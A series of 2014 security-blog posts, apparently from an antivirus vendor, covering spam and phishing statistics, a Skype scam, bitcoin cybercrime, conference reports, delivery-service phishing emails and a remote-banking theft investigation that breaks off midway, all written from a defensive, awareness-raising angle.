In August, the UK took the lead with 13.16% of all antivirus detections (+6.26 percentage points).  Germany (9.58%, -1.49 percentage points) and the USA (7.69%, -1.59 percentage points) were 2nd and 3rd respectively.

The most unexpected result arrived from Russia: its share grew by 3.33 pp from July and accounted for 6.73% which moved this country from 8th to 4th position in the ranking.

Italy (3.31%) dropped from 5th to 8th place having lost 1.33 percentage points. Hong Kong outran Australia, Turkey and Vietnam with 2.74% of all antivirus detections (+0.28 percentage points).

Special features of malicious spam

In August, the scammers again used fake notifications from Facebook to distribute malicious attachments. This time, users received a message from an unknown address warning them about the possible deactivation of their accounts. According to the text, over the last few days (and in some emails - months) the social network was attacked by hackers. To avoid any problems, the developers asked the users to install the utility attached to the email.

Each email contained a password-protected ZIP archive with an executable file and a unique password needed to unpack it. The attached archive bore the name of the user who the email was addressed (his email account login) and the same name was used to generate a password for the archive. At the end of the email the scammers said that the file could be only opened on a PC running under Microsoft OS. The utility in the archive was in fact a Trojan downloader, a representative of the Trojan-Downloader.Win32.Haze family. This malware downloads other malicious software usually developed to steal the owner's personal data or to send out infected emails to the address on his lists of contacts.

Phishing

In August 2014, Kaspersky Lab's anti-phishing component registered 32,653,772 detections which is 12,495,895 detections more than in the previous month. This considerable growth was probably caused by the summer slowdown in the demand for advertising spam. Fraudsters who do not want to lose their earnings switch to mass phishing mailings.

Australia topped the rating of countries most often attacked by phishers: during the month the number of Anti-Phishing component activations on computers of Australian users doubled and accounted for 24.4%. Brazil was 2nd with 19.5% of attacked users. It was followed by the UK (15.2%), Canada (14.6%) and India (14.5%).

The geography of phishing attacks*, August 2014

* The percentage of users on whose computers the Anti-Phishing component was activated, from the total number of all Kaspersky Lab users

Top 10 countries by the percentage of attacked users:

  Country % of users 1 Australia 24.4 2 Brazil 19.5 3 UK 15.2 4 Canada 14.6 5 India 14.5 6 UAE 14.1 7 Ecuador 13.1 8 Dominican Republic 13.0 9 Austria 12.8 10 China 12.7 Targets of attacks by organization

The statistics on phishing targets are based on detections made by Kaspersky Lab's anti-phishing component. It is activated every time a user enters a phishing page that has not previously been included in Kaspersky Lab databases. It does not matter how the user enters this page – by clicking the link contained in a phishing email or in the message in a social network or, for example, as a result of malware activity. After the activation of the security system, the user sees a banner in the browser warning of a potential threat.

In August, there was little change among the organizations most often attacked by phishers. Global Internet Portals remained the leading category with 30.8%; its share increased by 1.3 pp. Social networks came second with 17.3%, a 3.3 pp decline from the previous month. These two categories accounted for more than half of all phishing attacks in August.

Organizations most frequently targeted by phishers, by category – August 2014

Financial phishing accounted for 35.2% of all attacks, a 6.6 pp drop compared with the previous month. The percentage of detections affecting Banks, Online stores and E-payment systems went down 4.9, 1.2 and 0.6 pp respectively.

Top 3 organizations most frequently targeted by phishers   Organization % detections 1 Google 12.61% 2 Facebook 10.05% 3 Yahoo! 6.38%

In August, Google services were most heavily targeted by phishing links: their share was up 1 pp and had 12.61% of all Anti-Phishing component detections. Second was Facebook, which is traditionally the most popular phishing target. Its contribution increased by 0.4 pp. It is followed by Yahoo! (6.38%). For recap, in July third position was occupied by Windows Live.

In August spam traffic we came across several phishing mailings targeting logins and passwords for Yahoo services! The emails read that Yahoo! administration had registered attempts to enter the user's account from an unidentified device. This activity caused suspicion and the account would be blocked if the recipient did not confirm the username and password on a special page. The body of the email contained two links for verification of the personal data: the first one - to confirm the password and prevent blockage and the second one - to protect the account in case the entry had been performed ​​by anyone else. Both links had the same address and led to the same phishing page. The text of the messages in different mass mailings remained almost unchanged and the design of the emails used the Yahoo! logo.

The phishing page in one mass mailing was an exact copy of the official registration page, but in the other mailing a different background was used.

If you look at the HTML code of the phishing pages, it becomes clear that in the first case the victim's data was sent to the PHP page of the fraudsters while in the second case it was forwarded to an email address registered on a free email service. The HTML code also specified the address which would be entered in the 'From' field as well as the subject of the email. This enabled the fraudsters to identify the information about usernames and passwords received from the users within each mass mailing.

Conclusion

The percentage of spam in August's email traffic averaged 67.2%, which is only 0.2 percentage points up from July. The rating of the most popular sources of spam remained unchanged from July – the USA (15,9%), Russia (6%) and China (4.7%).

In August, scammers continued to spread "Nigerian letters" calling for help in the fall-out from the crisis in Ukraine. English-language emails supposedly written on behalf of an associate of the former Ukrainian president Viktor Yanukovych asked for assistance in investing money. Mikhail Khodorkovsky's on-going story was yet another pretext used by scammers to lure money from the victims.

Malicious emails imitating court summons were often seen in August's spam traffic. These messages were written in different languages and the attached malicious files were developed both to steal personal information and to extort money for decrypting files on the victims' computers.

To advertise pharmaceutical spam, scammers used fake notifications from the online Google Play store. The links in them led to pages advertising popular medications.

In August, spammers actively promoted the services of travel and debt collection agencies.

August's list of most widely-distributed malware was topped by Trojan.JS.Redirector.adf. The long-term leader Trojan-Spy.HTML.Fraud.gen maintained 2nd position in the rating.

In August 2014, Kaspersky Lab's anti-phishing component registered 32,653,772 detections which is 12,495,895 detections more than in the previous month. Australia was the country most often attacked by phishers: during the month the number of the Anti-Phishing component activations on computers of Australian users doubled and accounted for 24.4%. The Global Internet Portals category remained the sector most frequently targeted by phishers (30.8%). Financial phishing accounted for 35.2% of all attacks, a 6.6 pp drop compared with the previous month. Yahoo! entered the Top 3 organizations most frequently targeted by phishers.

Russian-speaking fraud on Skype

Thu, 09/25/2014 - 02:42

It used to be a common scam: Russian cybercriminals would send an SMS like: "Mom, I'm in trouble. Please, transfer me some funds. I will explain it properly when I get home". A whole bunch of friends and relatives got suckered by this fraud, believing that the message had genuinely come from someone close to them.

Fortunately, Russian mobile operators cracked down hard on this, forcing the criminals to give up. But now they've moved on to Skype. Yesterday I got this Skype message from one of my contacts:

Translation of the text:
Hey. I'm on a trip right now and I can't get to a payment terminal and top up my balance. Could you please transfer 100 rubles – or even better 200 – to the number  +7925XXXXXXX? I can't think of anyone else who could help me. It would really do me a big favor! I pay you back as soon as I get home!!

What happened? The cybercriminals stole my contact's password, probably using password stealing malware. Suddenly, even a Skype account without any money attached is worth something to a crook.

The victim will never see that couple of hundred rubles again. The number mentioned belongs to the cybercriminals, not to the Skype account-holder. It's impossible to say how many people fall victim to this kind of social engineering fraud, but in general we know that social engineering is an effective trick for scammers.

Well, that escalated quickly

Thu, 09/25/2014 - 02:00

An interesting title felt just about right for an interesting topic when I first submitted my research paper about the evolution of bitcoin cybercrime for this year's edition of the Virus Bulletin conference, held in the sleepless Seattle. Discussing the situation from an economic standpoint I aimed to paint a picture reflecting how the present geopolitical situation in Latin America makes the region a fertile ground for bitcoin enthusiasts, and by extension, cybercriminals. It's certainly not easy to capture a snapshot of a phenomena that changes so rapidly and present it to a group of security experts who are already well-informed about the subject. Nevertheless, with the aid of regional statistics, incident timelines and analysis of the most interesting malware samples, there is enough information in the report to give some clear indicators about what's been going on with the world's most popular cryptocurrency this past year, and what we can expect in the future when it comes to bitcoin-related cybercrime.

While some early adopters have been involved in the bitcoin market from the beginning (by means of mining or simply by participating in exchanges), others are just grasping the concept of cryptocurrencies and learning about the perils of bitcoin the hard way – be it in the form of ransomware demanding a quick payment or malicious mining code consuming their limited computing resources. From wallet stealing malware to large scale bitcoin exchange heists, we can find just about anything in the cryptoworld, and this is just the beginning. Nowadays, we talk about malware and cybercrime as two sides of the same (bit)coin, usually referring to organized crews of criminals with clearly defined roles engaging in illegal activities with the sole purpose of financial profit. It makes sense then, to observe the correlation between the number of malware samples in the wild targeting bitcoin users and the price of the currency being exchanged on global markets.

More users, more attacks: Kaspersky Lab stats show a surge in Bitcoin cybercrime

As mentioned in 2013's Kaspersky's Security Bulletin, our predictions for the cybercriminal bitcoin ecosystem came true – and then some: "Attacks on Bitcoin pools, exchanges and Bitcoin users will become one of the most high-profile topics of the year.  Attacks on stock exchanges will be especially popular with the fraudsters as their cost-to-income ratio is very favorable.

As for Bitcoin users, in 2014 we expect considerable growth in the number of attacks targeting their wallets. Previously, criminals infected victim computers and went on to use them for mining. However, this method is now far less effective than before while the theft of Bitcoins promises cybercriminals huge profits and complete anonymity."

It's a long time since we got through a week without one of the major bitcoin exchanges making headline news. We can attribute the success of some attacks to faulty technical implementations of bitcoin wallets, others relied on clever social engineering approaches, and the rest can be blamed on bad business practices and simple negligence about adhering to already proven security standards. There are just too many incidents to list, but there is a common thread uniting them all, which makes them a great body of experience for future generations of bitcoin exchanges to build on.

We have only recently seen why countries like Argentina and Brazil have become a fertile ground for the adoption of a cryptocurrency economy, and as we realize this, so have too cybercriminals. With a whole new set of frauds, scams and threats facing bitcoin holders, citizens need to be aware that keeping their savings secure in no easy task in today's hyper connected world. Because there are no borders for cryptocurrencies, there are none for criminals either, and following the money trail means landing in Latin America, where the general audience is still widely vulnerable to many attacks seen in other parts of the world.

After the Mt. Gox incident we have witnessed targeted phishing campaigns, bitcoin community members moonlighting as private investigators, localized ransomware samples, scams, mobile miners, internet of things devices participating in botnets, and everything else that this digital bitcoin gold rush has brought upon us.

Analysis of, Malware from the Mt. Gox Leak Archive

Being your own bank is more difficult than it seems

Alchemy proved possible for cryptocurrency enthusiasts, turning energy into capital, betting on the success and global adoption of their favorite choice. Seen by outsiders as a hobby for geeks, bitcoin is more than a currency, it's a community that has certain values ingrained and it's revolutionizing the financial world as we currently know it.

Collective but anonymous, organized yet decentralized, this ordered chaos is beginning to make sense after all the problems it has faced. The culling of the excess exchanges that used to be available brings a Darwinian equilibrium to the bitcoin ecosystem, forcing the ones left to implement better business practices and security measures.

Malware trends indicate that cybercriminals are migrating from mining botnets and pools to more direct wallet stealing and exchange credential hijacks. The inefficient mining Trojans working on mobile devices proved that accessing the funds stored in the victim's digital wallet can be much more straightforward than putting the effort into building a massive network of miners that reap minimal gains.

Debit Cards linked to bitcoin wallets are starting to appear and this brings another enticing entry point for criminals. With "bitwashing" services becoming more common, tracking stolen funds will prove much more difficult in the future, exposing the true anonymous nature of cryptocurrencies.

Once the de-facto choice for drug dealers and illegal markets, bitcoin is aiming to gain the global trust of other merchants, hoping that it will have a ready-made community to support it when it becomes the default standard for online and offline transactions. You can read the full paper presented at Virus Bulletin here.

September's 3x CON: Part 2

Wed, 09/24/2014 - 11:00

What, Where & When: The 0x07th edition of SEC-T, an annual Stockholm-based conference, was held on 18-19 September at the stunning Anrika Nalen venue, just a 15 minute walk from the famous Gamla Stan.

The Schedule
This conference features only one track of presentations, which – in my opinion – is quite a good thing, because you don't have to make any difficult choices This year, besides the regular full-time presentations, the agenda included a couple of 30-minute long "small talks" as well as a bunch of lightning talks of 10-20 minutes each.

SEC-T badge

The Talks
The conference kicked off with an excellent speech given by the founder of Recurity Labs, Felix "FX" Lindner, who has proven that an opening keynote doesn't necessarily have to be boring. After lunch, Andreas Lindh presented some really cool attacks on broadband modems, including DNS poisoning and attacks that exploit CSRF vulnerabilities to send or manipulate SMS messages. This was certainly one of my favourite talks, together with the really scary presentation given by Hugo Teso on aviation security. It's terrifying how easily an experienced hacker can exploit aviation protocols and avionics systems to change the on-board system configuration, including changes to the flight path!

The keynote

Amongst other talks, Meredith L. Patterson highlighted some pressing issues concerning the APIs of popular software, but, apparently, not everybody agrees with her highly-critical point of view. At the beginning of the second day, my colleague, David Jacoby, gave an entertaining presentation on how he hacked his home, including successful attacks on his NAS storage, ISP provided router, smart TV and other devices he found connected to the Internet.

Last, but not least, there were also some short but interesting lightning talks from a number of speakers (including myself :)) on topics such as URL parsing, hard drive cryptography and breaking out of the AngularJS sandbox. I did a short presentation about my background research on the current threat landscape for SOHO devices, which turned out to be quite in line with the conference's theme, featuring research on vulnerabilities in the so-called Internet-of-Things.

The Crew

In conclusion, this was a really nice conference, profiting from its one-track only schedule, very high-quality presentations and unique atmosphere. Congrats to the whole SEC-T crew – really good job, guys! And see you all next year!

September's 3x CON: Part 1

Tue, 09/23/2014 - 09:11

What, Where & When: the 4th edition of 44CON, an annual IT Security Conference organized by Sense/Net Ltd, took place on 10-12 September in London, at a venue near the Earl's Court exhibition center. Geeks, who happened to enjoy somewhat spooky historical monuments, could take a five minute walk from the venue to visit an old and impressive cemetery, one of the London's Magnificent Seven.

The Schedule this year was packed with three tracks of (mostly) 1h long presentations within a wide range of topics: from social engineering to exploitation techniques, from crypto-currencies to IoT related threats, to GSM hacking. Some amazing workshops were running simultaneously in rooms that were bearing the familiar names of AES, 2DES and Blowfish.

44CON Badge: BusBlaster v3

This year's Badge is not only extremely handsome, but also may turn out to be very handy, at least for hardware-oriented researchers, as it happens to be a BusBlaster v3 board, especially customized for 44CON (you can find the full specification here). This small cute thingy can be used to program and debug embedded ARM devices.

The Talks
With so many things going on simultaneously, it was impossible to fully attend even a third of them. Moreover, the online schedule didn't include the description of the talks, so in some cases choosing the right track in advance was kind of a lottery. Nevertheless, the overall quality of presentations was so high, that no matter which talks you chose, you always ended up with some new, valuable information.

Joshua J. Drake on the stage

From the selection of very good talks I attended, here are my favourite ones:

  • "Researching Android devices security with the help of a droid army", by Joshua J. Drake (@jduck) in which – in a quite entertaining way – Joshua explained how and why he built his research lab, capable of testing 40+ Android devices at the same time. I was really impressed by the framework Joshua invented for managing his "droid army".
  • "I hunt TR-069 Admins: pwning ISPs like a boss", by Shahar Tal (@jifa). This talk was especially interesting to me, as I'm currently involved in researching threats for small network devices, such as residential gateways (aka SOHO routers), from which a fair share is using the TR-069 protocol to talk to the ISP's Auto Configuration Servers. It turns out (not really surprisingly, if you ask me), that this protocol is poorly secured and highly vulnerable, and might be exploited in a way that could affect a whole set of devices. And the worst thing about it is that the average user can't do much to improve the security of their network, even if they have sufficient knowledge. Most of the responsibility lies with the service providers, together with hardware vendors, who don't seem concerned enough about security issues...
  • "On Her Majesty's Secret Service: GRX and Spy Agency", by Stephen Kho and Rob Kuiters. This quite an intriguing talk on how and why GCHQ hacked the Belgian GRX provider was given by experts from the KPN CISO team and concluded the 2nd day of the conference. The first part of the talk was a technical description of the GRX protocol, it's functionality and weaknesses, and which kind of information can be leaked; in the second part the speakers presented the results of "extensive network scanning" that they conducted during the last several months. It's really scary that there are a lot of devices running vulnerable and *terribly* outdated software on GRX networks.

Socializing at 44CON

The Networking has been made easier with Gin O'Clock, a one-hour break in the afternoon schedule (on both conference days), which was especially dedicated for human interaction and socialization in the intimate atmosphere of the conference bar. A traditional red double-decker bus was there to provide British ale, cider and Pimm's; every attendee was also offered a free glass of gin & tonic.

Some of The Materials have already been published and they are available at Slideshare.

Overall, The Experience was really great and we are looking forward to attending the next 44CON in 2015!

Scammers' delivery service: exclusively dangerous

Wed, 09/17/2014 - 06:00

Well-known companies and brands are favorite targets for fraudsters. After all, it is much easier to get people's attention with the use of a popular name, so scammers have more chance of trapping a gullible user.

In this article, we will analyze phishing and malicious emails sent by fraudsters that claim to come from international delivery services. The most popular of these are DHL (Germany), FedEx and United Parcel Service (USA), TNT (Netherlands). All of these companies are international, with millions of customers using branches in major countries all over the world. They provide similar services, so scammers use the same methods and techniques in their fraudulent mails.

The phishers' goals include:

  1. Theft of confidential data (bank card credentials, logins and passwords from personal accounts), mainly with the help of fake web pages imitating official pages of the site. In a phishing attack users provides the fraudsters with their personal data by filling the fields on fake sites or sending them via email.
  2. Installing various malicious programs on users' computers. These programs are used not only to monitor user online activity and steal personal information, but also to organize botnets to distribute spam and launch DDoS attacks.
Headings of fraudulent emails The From field

Structurally, the  address in the From field looks like this: Sender Name . To confuse recipients, scammers can change parts of the address and often make it look very similar to an official address of the delivery service.

There are several groups of email addresses seen in fraudulent emails:

  1. Email addresses which closely resemble companies' legitimate public addresses. Generally, they use the name of the company (DHL INC, TNT COURIER SERVICE, Fedex, etc.) as the sender name. The name of the mailbox often includes the words info, service, noreply, mail, support which are typical of email addresses used to send official notifications. The server domain name often has a real or very plausible company domain.
  2. Addresses which do not resemble legitimate company addresses. The sender name still reflects the company name (FedEx, DHL Service, FedEx.com) but the domain name usually belongs to a free email service or an absolutely different company. The email address could be taken from a real user (taken from public sources or hacked mailboxes) or automatically generated addresses. The latter usually appear as a random sequence of letters, words and numbers.
  3. Addresses that resemble e-mail addresses of company employees. The sender name may contain the name and surname of a supposed employee, or the company name, or a position (courier, manager, etc). The name of the email box usually contains the same name and surname as the sender name because any difference in the data may alert the recipient to a fraudulent email. Either the real company domain or other domains not related to delivery companies might be used as a domain name.
  4. Addresses which only indicate the sender's address without a name.

While analyzing sender address, remember that scammers do not need to hack the company servers to use the real company domain in the From field. They can simply insert the necessary domain name of the server into the From field.

The Subject field

The subject of the fraudulent mail should capture the imagination of recipients and encourage them to open the message, but it also needs to be plausible. Therefore spammers choose common phrases typical of official notifications from delivery services. After sending a parcel or a document, customers worry about its successful delivery and try to follow its progress by reading any notification from a delivery service.

The most popular subjects are:

  1.  Subjects related to the delivery/shipment (shipment notifications, delivery status, shipping confirmation, shipment documents, delivery information, etc.).
  2. Examples:

  3. Subjects related to tracking shipments, order information and invoices (the tracking number of the shipment, tracking the shipment, etc.).
  4. Examples:

  5. Subjects related to notifications about messages and accounts (creation and confirmation of accounts, new messages, etc.).
The design of the email

Scammers pay special attention to the design of the email. Their main goal is to make message as believable as possible. After all, if it looks suspicious, a potential victim will most likely delete it despite the attractive subject and plausible sender address. Let's analyze the basic techniques that fraudsters use to make emails look legitimate.

Graphic design

All major international companies have their own corporate style, including wordmarks, graphic trademarks, corporate fonts, slogans and color schemes. These are used on the official website, in mailings and commercials, and in other design components. Scammers use at least some of these elements when designing fraudulent emails to make them look convincing. Usually phishers focus on logos because these elements are unique to each company and is an immediate identifying mark.

Examples of DHL company logos used in fraudulent emails.

Let's take a closer look at these examples. It's immediately obvious that the second example is very different from the company's official logo. Another sign of a forgery is the difference in size between the false logo and the original, as seen in the fourth example where the logo takes almost a third of the message. Here the plan is probably to attract the reader's attention with a large bright picture rather than plain text. That also explains why the phishing links appear in a larger font: users should respond to it immediately, without trying to read the small print.

In the first example, the scammers are trying to copy the design from the official site (a very popular method). However the logo is placed on the right-hand side rather than on the left. Also they are using a color blend for the logo background rather than making it single-color. The logo in the third example most closely imitates the original DHL logo: the scammers have tried to match its size and design. It's not really all that difficult to make a logo for a fake notification: there are plenty of versions of the original image available online in several formats, including vector graphics. In addition to the logo the fraudsters use the color spectrum chosen by the company in its official resources and mailings. For example, for DHL it is a combination of yellow and red.

The text design

In most official emails we find a number of set phrases, especially when it comes to standard notifications generated and sent automatically. These messages often include contacts and links to the official resources of the sender. Therefore, to make the text of the fake email look like an original notification from a delivery service the fraudsters use:

  1. Standard phrases typical of official mass mailings: Please do not reply to this email, This is automatically generated email, please do not reply, All rights reserved, Diese Versendung ist automatisch, Bitte beantworten Sie diese nicht, This communication contains proprietary information and may be confidential. Questo e' un email automatico, Si prega di non rispondere, etc.
  2. Links to the official page of the company. Not all links contained in the fraudulent email are phishing - spammers may also use the links which really lead to the official resources on order to make their emails look legitimate and bypass spam filtering.
  3. Contact for feedback. The fraudsters often indicate the contact information of the sender or the company (name, surname, position, office address). These contacts might be real or fictitious.
The content of the email

When fraudsters send out fake emails convincing readers that it is a real message is only part of the battle. The next step is to persuade the potential victim to do what the scammer requires, such as providing personal information or installing a malicious file. This is where psychology comes into play, and the email content is the main tool.

In fraudulent notifications allegedly sent on behalf of delivery services often use the following tricks:

  1. Notifications of various problems (eg. unsuccessful delivery, lack of information, wrong address, no recipient at the delivery address). These phrases are usually related to the delivery since the companies in question are in the service sector. Therefore, a logistics company warning of a problem with a delivery doesn't prompt any suspicion, especially if the email contains some details of the situation.
  2. A demand to do something or face some consequence. For example, "collect your parcel within 5 days otherwise it will be returned to the sender".
  3. The scammers use deadlines like this to make recipients react immediately. The phishers hope that users will be so worried about losing the parcel or paying extra costs that they won't hesitate to provide personal details or open a suspicious attachment.

  4. Phrases about the content of an attachment or link (invoices, detailed information, documents).
  5. Users are unlikely to open unknown attachments or follow unknown links. That's why scammers imitate official websites and present malware as a document with information a parcel. In addition, if the text of the notification states that the attachment contains, for example, a consignment document, the malicious archive will have a similar name, such as "consignment.zip." This applies to phishing links as well - scammers name their links with an appropriate phrase from the text, such as "shipping information".

    This simple trick is intended to reassure recipients that the attachment or link is perfectly legitimate.

  6. Phrases about the need to do something (follow a link, open an attachment, print out a file, etc.).
  7. Assuming the fraudsters have convinced the recipients that the email is real, the next step is to tell the victims how to solve their problems. Fulfilling these instructions is the ultimate goal of the fraudulent email. Here it is important for the scammers not just to tell recipients what they need to do, but to make them understand correctly what is written in the message. To avoid any misunderstanding on the part of the recipients, messages often contains detailed instructions about what to do.

How the text might change

Cheating the user is not the only thing scammers have to do. They also need to bypass spam filters and deliver the email to the email boxes of potential victims. One of the most popular and long-used methods to bypass filtering is to change text fragments within the email. Modern programs designed to send out spam messages include ample opportunities to generate multiple changes in the text. The text of a message which varies from email to email makes the email unique, while different personal information specified within one mailing (such as the number of the shipment, the form of the address, the dates) helps to convince recipients that the email is intended for them. In addition, the fraudsters can send out emails designed in the same style for several months - they only need to change some elements in the text.

Fraudulent notifications from delivery services can change:

  1. The information about the order/shipment, including the tracking number of the shipment, delivery dates, etc.)
  2. Contact details, sender names and company names. Some mass mailings provide an e-mail address or a phone number of a company representative for feedback. This particular data changes from email to email. In addition, names of company representatives and even company names themselves may also vary.
  3. The name of the attachment. It mainly refers to malicious attachments which names vary in messages within one mass mailing while these different names hide one and the same malicious program.
  4. Links. In phishing emails and emails with malicious attachments scammers often specifically change the addresses of the links, masking them with the help of different URL shorteners. Most of these links are quickly blocked by current antivirus programs.
  5. Phrases indicating numbers and dates. These can refer to timetables (days, hours), sums of money and dates (day and month)
  6. The greeting. Here spammers generally use the email address and/or the name of the recipient. Sometimes they use generic expressions (Dear client, Dear customer, etc.) instead.
  7. Other text fragments. Some words are replaced with other phrases that have a similar meaning so the general sense of the sentence remains unchanged.

Let's analyze some examples of changes in the text of fraudulent emails.

Below are some emails from yet another mass mailing.

Fake pages

To steal personal information from users, scammers create phishing HTML pages which partially or completely copy the official website of a company. If victims of fraud enters their personal information (bank details, usernames and passwords) on this page, that data immediately falls into the fraudsters' hands.

To mask the links leading to phishing websites the fraudsters often use popular free URL shorteners. In addition, most services offer customers the ability to view the statistics on the short link which tells fraudsters more about the number of clicks on any links etc. Phishing pages can be located on specially registered domains which usually have a short life span as well as on compromised domains whose owner may not even be aware that the web site is being used for fraudulent purposes.

Let's analyze a fake email sent on behalf of FedEx in which recipients are asked to update their account information. The text of the email contains a link to the official website of the company while the real address to which the user is redirected is nothing like the legitimate page and is located on a free URL shortener service. This becomes obvious when you hover on the link.

After clicking the link, users get to a fraudulent page imitating the official website of FedEx, where they are asked to enter their logins and passwords to access their accounts. Once the users fill in the fields and click "Login", the entered information is transmitted to the scammers who can then access the victims' personal accounts. The menu tabs and other links on the phishing page are often inactive, so clicking on them will not take users to the appropriate page. However, in some cases, phishers imitate all links on the page so that users do not have any doubt about its legitimacy. Sometimes the design of the page imitates the official site but does not copy it completely. If you have a closer look at the details, you will see some differences between the designs of the real and the fake pages. However, most users do not pay attention to small details and this carelessness helps the scammers to steal personal information.

Below is yet another example of an email sent on behalf of FedEx. This time it contains a malicious link.  The email informs recipients that delivery is impossible because of missing information. And now users have to follow the specified link for verification.

The link leads to a fraudulent page where potential victims are invited to download a program that will supposedly check whether they are really going to receive a parcel. Naturally, the program turns to be the well-known Zeus Trojan, which helps the fraudsters to access the computer and all the personal information on it.

Scammers might not only include a phishing link in the body of the email, but also attach an HTML phishing page designed to steal personal data. However this use of HTML attachments as phishing pages is unusual for fraudulent mailings sent on behalf of delivery services.

Fraudulent emails in different languages

To increase the audience of recipients and customers, spammers are mastering new languages. In addition to traditional English and German, current spam traffic includes emails in Hebrew, Albanian and other languages​​ which were found in advertising and fraudulent mailings a few years ago. For example, you may come across fake notifications from international delivery services written in Italian and Dutch. These emails do not have any special features that distinguish them from English- or German-language messages - to cheat users, the fraudsters resort to the same tricks.

For example, this Italian-language fake notification from FedEx tells users to confirm their identity by following a fraudulent link.

Yet another mass mailing in Italian contained a malicious archive which included the Zeus/Zbot Trojan used to steal personal data. The fraudulent email claimed that the user profiles on the website had been updated and there was more detailed information about it in the archive.

Another fake notification written in Dutch on behalf of TNT informs recipients that new accounts have been formed for them, with details in the attachment. The archive attached to the email contains Backdoor.Win32.Andromeda, a malicious file that allows the scammers to control the infected computer without the user knowing.

Malware in fraudulent emails

Spam is one of the most popular ways of spreading malware and infecting computers on the Internet. Attackers have various tricks to make victims install malicious software on their computers. Email traffic includes a variety of private emails, such as wedding invitations, dating offers and other similar messages. However, fake notifications from well-known companies and brands providing different services remain the most popular cybercriminal trick. International delivery services are also used by spammers as a cover for malicious spam.

Malware spread in fake notifications from delivery services is divided into:

  1. Trojan programs developed to perform unauthorized operations in order to delete, block, modify or copy data, to disrupt computer or network performance. Trojans distributed in spam include Backdoors, Trojan-Downloaders, Trojan-Proxies, Trojan-PSWs, Trojan-Spies, Trojan-Bankers and others
  2. Worms, malicious programs capable of unauthorized self-proliferation on computers or computer networks. Those copies go on to spread themselves further.

What is dangerous about malicious programs?

  1. They can steal usernames and passwords from users' accounts, as well as financial or other information sought by the attackers.
  2. They can create botnets for distributing spam, DDoS attacks and other criminal activity
  3. They can provide fraudsters with control over victim computers, including the ability to run, delete or install any files or programs.

Current malicious programs integrate broad-ranging fraudulent functionality. In addition, some malicious programs can download other malware, providing additional opportunities. These might include stealing usernames and passwords entered in the browser or seizing remote control over the whole computer.

Malicious objects in fraudulent notifications can be embedded directly in the email or downloaded from a link provided in the body of the message. The most dangerous thing about it is that malware can be run and installed without users being aware or installing any software themselves. Typically, malicious ZIP (less often RAR) files enclosed in fraudulent emails have an executable .exe extension.

How to recognize phishing emails

Below are a number of features that can help to identify a fraudulent email.

  1. The sender address. If the sender address includes a random sequence of letters, words or numbers, or the domain has no connection with the official address of the company, the emails should undoubtedly be considered fraudulent and deleted without opening.
  2. Grammar and spelling mistakes. Wrong word order, incorrect punctuation, grammar and spelling mistakes can also be a sign of a fraudulent mailing.
  3. Graphic design. Scammers are doing their best to make the email look very similar to the original. To this ends they are trying to imitate other companies' corporate styles using some of their elements such as color schemes and logos. Inaccuracies and noticeable design errors are among the signs of a fake email.
  4. The content of the email. If the recipient of the email is asked under various pretexts to urgently provide or confirm personal information, download a file or a link – especially while being threatened with sanctions for not doing so – the email may well be fraudulent.
  5. Links with different addresses. If the address of the link specified in the body of the email and address of the actual link to which you are redirected do not match, you are definitely looking at a fraudulent email. If you are viewing your email from the browser, the actual link can be usually seen in the bottom left of the browser window. If you use an email client, the actual link can be displayed in a popup window if you hover the cursor over the link in the text. Fraudulent links can also be attached to a text phrase in the email.
  6. Attached archives. Generally, ZIP and RAR archives are used by cybercriminals to hide malicious executable EXE-files. Therefore, you should not open these archives or run the attached files.
  7. Lack of contacts for feedback. Legitimate emails always provide contact information for feedback - either the company or the sender's personal contacts.
  8. Form of address. Fraudulent emails do not necessarily use the first name or the surname to address the recipient; sometimes a universal form of address ("client", etc.) is used.

Thefts in Remote Banking Systems: Incident Investigations

Thu, 09/11/2014 - 06:00

More and more companies are asking Kaspersky Lab to carry out detailed investigations of malware-related IT security incidents affecting their business.

In this article, we will describe a typical cybercriminal attack aiming at stealing corporate financial assets from a remote banking system.

Description of the Incident

An organization recently asked Kaspersky Lab to investigate an incident that had occurred in its corporate remote banking system: a bank representative contacted the organization's accounting department and asked for confirmation of a payment worth 3 million rubles (about US$80,000). It transpired that nobody in the organization had ever heard of this payment. The accountant was certain that he did not make that payment; he explained that he was out on his lunch break at the time of the transaction.

The accountant used banking software on his workstation to prepare payment orders and send them to the bank. The logs on this software recorded two suspicious payments to the same address. The first was a relatively small payment of 300,000 rubles. This did not sound any alarm bells, and was processed without a query. The second payment, worth 3 million rubles, alerted the staff at the company's bank.

It was clear that the accountant had not made the payments himself, so the organization suspected a malware attack. But how was that possible? They were using specialized banking software with password protection. They required a special file to access the remote banking system, and the bank itself would check the IP address of the sender of any payment.

Investigation

The main goal of a malware incident investigation is to accurately assess the consequences of the attack, identify every compromised computer and establish exactly how the malware penetrated the victim computer(s). The organization affected can then use this information to effectively mitigate the damage and address weaknesses in its corporate security system to prevent such incidents from happening in the future.

During the investigation, it is also sometimes possible to detect hitherto-unknown malware species and add their signatures to the security databases, protecting other users from their future impact.

In this case an image of the hard disk from the accountant's desktop was provided to Kaspersky Lab's Global Emergency Response Team (GERT) for analysis and investigation.

Remote Access to Desktop

During our first-pass analysis of the accountant's hard drive, we identified a modified version of the legal Remote Manipulator System which enables remote access to the computer. This type of software is often used by accountants and system administrators. However, this program was located in a suspicious catalogue, had a suspicious name ('C:\windows\dotcom\wmiterm.exe' is an overly "system-related" path , so even an advanced user is unlikely to smell a rat), and had two modifications to conceal its operation:

  • The icon in the Windows Task Bar was hidden,
  • The Registry key where the program stores its configuration was modified: 'HKLM\SYSTEM\Remote Manipulator System\v4' was changed to 'HKLM\SYSTEM\System\System\Remote\ Windows', which again looks very similar to the system registry key.

These modifications are typical of malware, so we added signatures for this program to Kaspersky Lab's antivirus databases – it is detected as malicious with the verdict 'Backdoor.Win32.RMS'.

While analyzing the operation of Backdoor.Win32.RMS, we discovered that the cybercriminals used it to download another malware program onto the victim computer, 'Backdoor.Win32.Agent'. (This detection was added to Kaspersky Lab products immediately). That backdoor provided remote VNC (Virtual Network Computing) access to the victim computer. Interestingly, the code of this malware program has a lot in common with the 'hVNC' module of the Carberp Trojan. Carberp's source code is available for public access.

So, how did Backdoor.Win32.RMS sneak onto the accountant's desktop?

Infecting a Corporate Desktop

In the Microsoft Outlook database, stored in the file 'outlook.pst' on the hard drive, we found an email containing an attachment named "запрос ИФНС № АС-4-31339.doc" ('Federal Tax Service request no. AC-4-31339.doc'). Kaspersky Lab Anti-Virus detected that Microsoft Office document as malicious with the verdict 'Exploit.MSWord.CVE-2012-0158.'

The cybercriminals used social engineering methods: the email was sent in the name of Russia's Federal Tax Service, called for immediate action, and provided contact details of real Tax Service officers.

